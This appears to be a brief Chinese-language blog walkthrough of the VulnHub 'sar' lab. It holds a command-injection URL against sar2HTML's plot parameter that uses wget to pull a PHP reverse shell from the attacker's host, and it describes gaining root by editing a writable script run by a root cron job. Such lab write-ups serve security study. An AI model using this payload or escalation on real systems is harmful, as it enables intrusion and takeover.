{{帝力于我何有哉}} 不疯魔,不成活。 Be obsessed, or be average.
vulnhub >_ sar
Published on 09 Nov 2020
sar
只有80一个端口
sudo dirsearch -u http://192.168.1.116/ -e php,txt,apsx,asp,html -w /usr/share/wordlists/dirb/big.txt -r
确认wget
制作php rshell
假设本地服务,通过wget下载到目录
http://192.168.1.116/sar2HTML/index.php?plot=;wget http://192.168.1.108:8080/php-reverse-shell.php
使用ls也可以认证上传成功
计划任务中有一个脚本是以root执行的。/var/www/html/finally.sh
不可写,查看一下内容,发现关联的write.sh是可写的。
由于vi回显示不好,直接本地复制文本,目标上vi write.sh dd删除行,然后粘帖进去文本保存
任务5分钟执行一次。监听等待得到root
